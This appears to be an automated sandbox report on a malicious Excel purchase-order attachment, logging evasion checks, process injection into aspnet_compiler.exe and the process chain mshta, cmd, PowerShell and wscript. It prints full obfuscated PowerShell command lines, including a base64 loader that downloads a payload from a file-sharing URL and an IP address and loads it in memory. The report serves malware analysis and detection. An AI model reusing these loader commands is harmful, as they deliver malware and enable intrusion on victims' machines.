Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: PO#BBGR2411PO69.xls Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: PO#BBGR2411PO69.xls Stream path 'Workbook' entropy: 7.99849766453 (max. 8.0)
Source: 09230000.0.dr Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: 09230000.0.dr Stream path 'Workbook' entropy: 7.99844135628 (max. 8.0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AC0101 rdtsc 27_2_00AC0101
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1166
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6156
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll
Source: C:\Windows\System32\mshta.exe TID: 3704 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 1536 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 8392 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -3600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 748 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep count: 1270 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep count: 1565 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132 Thread sleep count: 1421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132 Thread sleep count: 6156 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -3000000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3768 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3716 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AC0101 rdtsc 27_2_00AC0101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk, 27_2_00A707AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A60080 mov ecx, dword ptr fs:[00000030h] 27_2_00A60080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A600EA mov eax, dword ptr fs:[00000030h] 27_2_00A600EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A826F8 mov eax, dword ptr fs:[00000030h] 27_2_00A826F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
